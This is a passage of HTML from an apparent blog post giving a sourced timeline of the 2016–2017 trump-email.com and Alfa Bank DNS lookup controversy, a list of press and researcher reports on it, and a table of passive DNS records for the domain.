<li><span style="font-family: inherit;">2007-06-21 <a href="http://www.prnewswire.com/news-releases/cendyn-is-tapped-for-interactive-marketing-services-by-the-trump-organization-58251682.html">Cendyn is chosen as a marketing vendor for Trump Hotels</a> (src. <a href="http://www.prnewswire.com/news-releases/cendyn-is-tapped-for-interactive-marketing-services-by-the-trump-organization-58251682.html">Prnewswire</a>)</span></li>
<li><span style="font-family: inherit;">2009-08-14 TRUMP-EMAIL.COM registered by sl.admin@cendyn.com (src. <a href="https://research.domaintools.com/research/whois-history/search/?q=trump-email.com">Domaintools.com</a>)</span></li>
<li><span style="font-family: inherit;">2010 Last time, according to Hope Hicks (White House) when MAIL1.TRUMP-EMAIL.COM on 66.216.133.29 was used by Trump (src. <a href="https://www.theguardian.com/us-news/2016/oct/31/trump-organization-server-russia-bank-slate-report">The Guardian</a>)</span></li>
<li><span style="font-family: inherit;">2011-03-07 Email header of a message sent on March 7, 2011 (Src. <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6xFZR0UxoxeRZOIA5yFOZwPwgXEODCpJ1nXZ2XS45ynR0Al5QJbumol5-hhoZi5zED5NCaQOHe0968Gsm4-I9XzcArT5lPAGb9-RPVA-1cFv-eWl2RRZeniMrjv1NAj2lv-EWq-7lrPig/s1600/header.png">DeepEnd Res</a>)</span></li>
<li><span style="font-family: inherit;">2016-March Last time the server was used to send emails, according to Cendyn (src. <a href="http://www.cnn.com/2017/03/09/politics/fbi-investigation-continues-into-odd-computer-link-between-russian-bank-and-trump-organization/index.html">CNN</a>)</span></li>
<li><span style="font-family: inherit;">2016-05-04 First time stamp in the <a href="http://ljean.com/NetworkRecords/ns2_cdcservices_com.log">leaked logs</a></span></li>
<li><span style="font-family: inherit;">2016-07 <a href="https://gdd53.wordpress.com/">Tea Leaves </a>researches logs and shares data with computer experts</span></li>
<li><span style="font-family: inherit;">2016-09-13 Last time MAIL1.TRUMP-EMAIL.COM A record was seen by pDNS on 66.216.133.29</span></li>
<li>2016-09-23 Last timestamp in the <a href="http://ljean.com/NetworkRecords/ns1_cdcservices_com.log" style="font-family: inherit;">leaked logs </a></li>
<li><span style="font-family: inherit;">2016-09-21 <a href="http://ljean.com/NetworkRecords/all.html">Alfa Bank were contacted for comments</a></span></li>
<li><span style="font-family: inherit;">2016-09-22 <a href="http://ljean.com/NetworkRecords/all.html">DNS Errors on trump-email.com</a></span></li>
<li><span style="font-family: inherit;">2016-09-23 <a href="http://ljean.com/NetworkRecords/all.html">DNS Errors on trump-email.com</a></span></li>
<li><span style="font-family: inherit;">2016-09-23 Alfa Bank 217.12.97.15 and 217.12.97.137 make DNS A record queries for MAIL.TRUMP-EMAIL.COM (mail without 1) that is on 198.91.42.236 (src. <a href="http://ljean.com/NetworkRecords/ns1_cdcservices_com.log">leaked logs</a>)</span></li>
<li><span style="font-family: inherit;">2016-09-23 Three CNAME and A queries for (pseudo?)random subdomain of trump-email.com get registered by pDNS</span></li>
<li><span style="font-family: inherit;">2016-09-27 <a href="https://gdd53.wordpress.com/">Alfa Bank 217.12.97.15 makes a DNS A record query for TRUMP1.CONTACT-CLIENT.COM</a></span></li>
<li><span style="font-family: inherit;">2016-09-30 TRUMP1.CONTACT-CLIENT.COM first seen by Farsight pDNS on 66.216.133.29</span></li>
<li><span style="font-family: inherit;">2016-10-03 TRUMP1.CONTACT-CLIENT.COM first seen by Virustotal pDNS on 66.216.133.29<br />2016-10-03 TRUMP1.CONTACT-CLIENT.COM first seen by PassiveTotal pDNS on </span>66.216.133.29</li>
<li><span style="font-family: inherit;">2016-10-05 GDD53 publishes the original article <a href="https://gdd53.wordpress.com/">Trump’s Russian Bank Account</a></span></li>
<li><span style="font-family: inherit;">2017-02-17 According to the Alfa Bank press release on 2017-03-17, computers in USA sent requests to "Trump Organization server" and made it look like it came "from MOSCow.ALFAintRa.nET", thus the "Trump's server's" replies were sent to Alfa bank.(src. <a href="https://alfabank.ru/press/news/2017/3/17/38162.html">Alfa Bank</a> and <a href="http://circa.com/politics/alfa-bank-in-russia-said-donald-trump-computer-connections-may-have-been-hacker-hoax">Circle</a>)</span></li>
<li><span style="font-family: inherit;">2017-03-08<a href="http://trump-email.com%20was%20transferred%20by%20cendyn/"> TRUMP-EMAIL.COM was transferred by Cendyn</a> to "Registrant Organization: Trump Orgainzation Registrant Street: 725 Fifth Avenue Registrant City: New York"</span></li>
<li><span style="font-family: inherit;">2017-03-04 - <i>29.133.216.66.in-addr.arpa.</i> PTR for MAIL1.TRUMP-EMAIL.COM last seen on 66.216.133.2 (via dig -x)</span></li>
<li><span style="font-family: inherit;">2017-03-11 and 2017-03-13 </span>According to the Alfa Bank press release on 2017-03-17, their systems received 1340 DNS replies to the queries they did not send for mail.trump-email.com.moscow.alfaintra.net.(src. <a href="https://alfabank.ru/press/news/2017/3/17/38162.html">Alfa Bank</a> and <a href="http://circa.com/politics/alfa-bank-in-russia-said-donald-trump-computer-connections-may-have-been-hacker-hoax">Circle</a>)</li>
</ul>
<div>
<br />
<h2 style="text-align: left;">
<b>Previous Reports and Research</b></h2>
<ul style="text-align: left;">
<li>2016-10-05 Tea Leaves GDD53 <a href="https://gdd53.wordpress.com/">Trump’s Russian Bank Account</a></li>
<li>2016-10 DNS logs Jean Camp T<a href="http://ljean.com/NetworkData.php">ransparent Network data</a></li>
<li>2016-10-05 Krypt3ia GDD53: <a href="https://krypt3ia.wordpress.com/2016/10/08/gdd53-a-russian-hosted-i2p-site-that-claims-trumps-email-system-had-ties-to-alfabank-russia/">A Russian Hosted i2p Site That Claims Trump’s Email System Had Ties To Alfabank (Russia)</a></li>
<li>2016-10-31 Slate <a href="http://www.slate.com/articles/news_and_politics/cover_story/2016/10/was_a_server_registered_to_the_trump_organization_communicating_with_russia.html">Was a Trump Server Communicating With Russia?</a></li>
<li>2016-11-01 Krypt3ia <a href="https://krypt3ia.wordpress.com/2016/11/01/shits-gone-plaid-gdd53-and-slate/">Shits Gone Plaid: GDD53 and Slate</a></li>
<li>2016-11-01 <a href="http://blog.erratasec.com/2016/11/debunking-trumps-secret-server.html#.WMnhOxIrKso">Errata Security Debunking Trump's "secret server"</a></li>
<li>2016-11-03 Errata Security <a href="http://blog.erratasec.com/2016/11/in-which-i-have-to-debunk-second-time.html#.WMni6xIrKsq">In which I have to debunk a second time</a></li>
<li>2016-11-01 Washington Post <a href="https://www.washingtonpost.com/news/the-fix/wp/2016/11/01/that-secret-trump-russia-email-server-link-is-likely-neither-secret-nor-a-trump-russia-link/?utm_term=.05c093a62fa4">That secret Trump-Russia email server link is likely neither secret nor a Trump-Russia link</a></li>
<li>2016-11-01 <a href="https://theintercept.com/2016/11/01/heres-the-problem-with-the-story-connecting-russia-to-donald-trumps-email-server/">The Intercept Here is a problem with the story connecting Russia to Donald Trump's Email </a></li>
<li>2016-11-02 <a href="http://www.slate.com/articles/news_and_politics/politics/2016/11/the_trump_server_evaluating_new_evidence_and_countertheories.html">Slate. Trump’s Server, Revisited</a></li>
<li>2017-03-10 CNN <a href="http://www.cnn.com/2017/03/09/politics/fbi-investigation-continues-into-odd-computer-link-between-russian-bank-and-trump-organization/index.html">Sources: FBI investigation continues into 'odd' computer link between Russian bank and Trump Organization</a></li>
<li>2017-03 Snopes (Unproven) <a href="http://www.snopes.com/trump-server-tied-to-russian-bank/">Trump Organization Computer Server Tied to Russian Bank?</a></li>
<li>2017-03-17 <a href="https://alfabank.ru/press/news/2017/3/17/38162.html">Alfa Bank. Заявление для прессы</a></li>
<li>2017-03-17 Circa.<a href="http://circa.com/politics/alfa-bank-in-russia-said-donald-trump-computer-connections-may-have-been-hacker-hoax"> Russian bank tells DOJ mysterious Trump computer connections may have been hacker hoax</a></li>
</ul>
<br />
<br />
<br />
<style type="text/css"><!--td {border: 1px solid #ccc;}br {mso-data-placement:same-cell;}</style></div>
</div>
</div>
--><span data-sheets-userformat="{"2":897,"3":{"1":0},"10":0,"11":4,"12":0}" data-sheets-value="{"1":2,"2":"https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com."}" style="color: #1155cc; font-family: "arial" , "sans" , sans-serif; font-size: 13px; text-decoration: underline;"><a class="in-cell-link" href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." target="_blank">https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com.</a></span><span data-sheets-userformat="{"2":897,"3":{"1":0},"10":0,"11":4,"12":0}" data-sheets-value="{"1":2,"2":"https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com."}" style="color: #1155cc; font-family: "arial" , "sans" , sans-serif; font-size: 13px; text-decoration: underline;"><a href="https://www.farsightsecurity.com/">courtesy of Farsight Security pDNS</a></span><br />
<br />
<table cellspacing="5" class="result" style="background-color: white; border-color: rgb(0, 136, 204); border-radius: 4px; border-style: solid; border-width: 2px; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; margin: 1em 2.5em; padding-left: 1em; padding-right: 1em;"><tbody>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">2498</span></td></tr>
<tr><td><span style="color: #20124d;">first seen in zone file</span></td><td colspan="2"><span style="color: #20124d;">2010-04-24 16:12:21 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen in zone file</span></td><td colspan="2"><span style="color: #20124d;">2017-03-07 17:02:37 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns1.cdcservices.com." style="text-decoration: none;"><span style="color: #20124d;">ns1.cdcservices.com.</span></a></tt></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns2.cdcservices.com." style="text-decoration: none;"><span style="color: #20124d;">ns2.cdcservices.com.</span></a></tt></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns3.cdcservices.com." style="text-decoration: none;"><span style="color: #20124d;">ns3.cdcservices.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">9</span></td></tr>
<tr><td><span style="color: #20124d;">first seen in zone file</span></td><td colspan="2"><span style="color: #20124d;">2017-03-08 17:02:36 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen in zone file</span></td><td colspan="2"><span style="color: #20124d;">2017-03-16 16:02:32 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns33.domaincontrol.com." style="text-decoration: none;"><span style="color: #20124d;">ns33.domaincontrol.com.</span></a></tt></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><span style="color: #20124d;">ns34.domaincontrol.com.</span></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><span style="color: #20124d;">trump-email.com.</span></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">69</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-08 02:52:17 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-17 21:39:58 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_A_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">A</span></a></tt></td><td><tt><span style="color: #20124d;">184.168.221.46</span></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><span style="color: #20124d;">com.</span></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">84316</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2010-07-02 19:20:21 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-08 01:43:28 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns1.cdcservices.com." style="text-decoration: none;"><span style="color: #20124d;">ns1.cdcservices.com.</span></a></tt></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><span style="color: #20124d;">ns2.cdcservices.com.</span></tt></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns3.cdcservices.com." style="text-decoration: none;"><span style="color: #20124d;">ns3.cdcservices.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><span style="color: #20124d;">com.</span></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">292</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-08 02:52:17 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-17 14:31:14 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns33.domaincontrol.com." style="text-decoration: none;"><span style="color: #20124d;">ns33.domaincontrol.com.</span></a></tt></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns34.domaincontrol.com." style="text-decoration: none;"><span style="color: #20124d;">ns34.domaincontrol.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><span style="color: #20124d;">trump-email.com.</span></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">6251</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2010-07-23 05:00:14 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-23 08:36:45 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns1.cdcservices.com." style="text-decoration: none;"><span style="color: #20124d;">ns1.cdcservices.com.</span></a></tt></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns2.cdcservices.com." style="text-decoration: none;"><span style="color: #20124d;">ns2.cdcservices.com.</span></a></tt></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns3.cdcservices.com." style="text-decoration: none;"><span style="color: #20124d;">ns3.cdcservices.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><span style="color: #20124d;">trump-email.com.</span></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">166</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-08 02:52:17 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-18 02:23:26 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns33.domaincontrol.com." style="text-decoration: none;"><span style="color: #20124d;">ns33.domaincontrol.com.</span></a></tt></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns34.domaincontrol.com." style="text-decoration: none;"><span style="color: #20124d;">ns34.domaincontrol.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><span style="color: #20124d;">trump-email.com.</span></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">113</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-08 04:25:30 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-17 21:40:00 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_SOA_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">SOA</span></a></tt></td><td><tt><span style="color: #20124d;">ns33.domaincontrol.com. dns.jomax.net. 2017030700 28800 7200 604800 600</span></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><span style="color: #20124d;">trump-email.com.</span></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">10</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2014-11-02 07:51:23 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2014-11-18 11:50:25 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_SOA_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">SOA</span></a></tt></td><td><tt><span style="color: #20124d;">ns1.cdcservices.com. postmaster.centralservices.local. 2012062509 1200 120 1209600 3600</span></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">2106</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2014-12-04 23:24:31 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-23 13:47:43 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_SOA_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">SOA</span></a></tt></td><td><tt><span style="color: #20124d;">ns1.cdcservices.com. postmaster.centralservices.local. 2012062510 1200 120 1209600 3600</span></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">1</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2011-09-13 21:38:59 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2011-09-13 21:38:59 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_MX_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">MX</span></a></tt></td><td><tt><span style="color: #20124d;">10 mx20.cdcservices.com.</span></tt></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_MX_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">MX</span></a></tt></td><td><tt><span style="color: #20124d;">20 mx21.cdcservices.com.</span></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">18</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-11 03:22:33 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-17 21:40:00 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_MX_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">MX</span></a></tt></td><td><tt><span style="color: #20124d;">0 smtp.secureserver.net.</span></tt></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_MX_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">MX</span></a></tt></td><td><tt><span style="color: #20124d;">10 mailstore1.secureserver.net.</span></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">12</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2011-12-14 22:04:06 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-23 08:36:45 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_MX_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">MX</span></a></tt></td><td><tt><span style="color: #20124d;">10 <a href="https://www.dnsdb.info/#Search_rdata_name_ANY_incoming.cdcservices.com." style="text-decoration: none;">incoming.cdcservices.com.</a></span></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">10</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2014-11-14 11:17:46 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-23 12:59:33 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_TXT_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">TXT</span></a></tt></td><td><tt><span style="color: #20124d;">"Internet Solution from Cendyn.com."</span></tt></td></tr>
